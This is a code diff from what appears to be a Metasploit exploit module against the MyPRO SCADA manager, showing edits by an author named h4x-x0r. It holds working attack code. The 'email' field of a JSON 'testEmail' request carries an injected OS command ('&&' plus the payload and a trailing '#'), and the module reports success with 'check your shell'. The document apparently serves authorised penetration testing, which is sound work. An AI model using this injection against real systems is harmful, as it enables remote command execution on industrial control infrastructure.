updated

updated

Author: h4x-x0r

modules/exploits/windows/scada/mypro_mgr_cmd.rb

@@ -69,15 +69,13 @@ def check
     if res.to_s =~ /const v="([^"]+)"/
       version = ::Regexp.last_match(1)
       vprint_status('Version retrieved: ' + version)
-
       if Rex::Version.new(version) <= Rex::Version.new('1.2')
         return CheckCode::Appears
-      else
-        return CheckCode::Safe
       end
-    else
-      return CheckCode::Unknown
+
+      return CheckCode::Safe
     end
+    return CheckCode::Unknown
   end
 
   def exploit
@@ -92,20 +90,20 @@ def execute_command(cmd)
   def exec_mypro_mgr(cmd)
     post_data = {
       'command' => 'testEmail',
-      'email' => "#{Rex::Text.rand_text_alphanumeric(3..12)}@#{Rex::Text.rand_text_alphanumeric(4..8)}.com&&#{cmd}"
+      'email' => "#{Rex::Text.rand_text_alphanumeric(3..12)}@#{Rex::Text.rand_text_alphanumeric(4..8)}.com&&#{cmd} #"
     }
 
-    post_json = JSON.generate(post_data)
-
     res = send_request_cgi({
       'method' => 'POST',
       'ctype' => 'application/json',
-      'data' => post_json,
+      'data' => JSON.generate(post_data),
       'uri' => normalize_uri(target_uri.path, 'get')
     })
 
-    if res && res.code == 200 # If the injected command executed and terminated within the timeout, a HTTP status code of 200 is returned. Depending on the payload, we might not get a response at all due to a timeout.
+    if res&.code == 200 # If the injected command executed and terminated within the timeout, a HTTP status code of 200 is returned. Depending on the payload, we might not get a response at all due to a timeout.
       print_good('Command successfully executed, check your shell.')
+    else
+      print_error('Unexpected or no reply received.')
     end
   end